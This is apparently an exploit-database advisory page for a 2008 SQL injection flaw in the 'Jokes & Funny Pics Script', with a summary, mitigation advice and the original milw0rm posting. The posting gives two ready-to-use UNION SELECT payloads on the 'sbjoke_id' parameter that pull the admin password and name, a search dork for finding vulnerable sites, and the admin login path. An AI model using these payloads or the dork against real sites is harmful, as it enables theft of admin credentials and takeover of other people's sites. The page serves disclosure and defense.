Jokes & Funny Pics Script SQL Injection Vulnerability

vendor:

Jokes & Funny Pics Script

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Jokes & Funny Pics Script

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

Jokes & Funny Pics Script SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection in the Jokes & Funny Pics Script. The exploit can be executed by injecting a malicious payload in the 'sbjoke_id' parameter of the 'index.php' script. This allows the attacker to retrieve sensitive information from the database, such as the admin password and name.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using parameterized queries or prepared statements can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

#########################################################
#
#   Jokes & Funny Pics Script  SQL Injection Vulnerability
#========================================================
#
#    Author: Hussin X                                   
#                                                       
#    Home :  www.tryag.cc/cc                            
#                                                     
#    email:  darkangel_g85[at]Yahoo[DoT]com            
#            hussin.x[at]hotmail[DoT]com                
#                                               
#========================================================
#    HomE script : http://www.softbizscripts.com
#     
#    Demo : http://www.softbizscripts.com/scripts/jokes  
#    
#    DorK : "index.php?sbjoke_id="

##########################################################

Exploit:   


http://www.site.org/Script/index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin--


Exploit: 2

index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10,11,12,13+from+sbjks_admin--

Login :

/admin/

 
################################################################################
####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
#                 Silic0n  / Rafi / FAHD / Iraqihack                           #      
#                                                                              #
#################################(and All IRAQIs)###############################

# milw0rm.com [2008-06-25]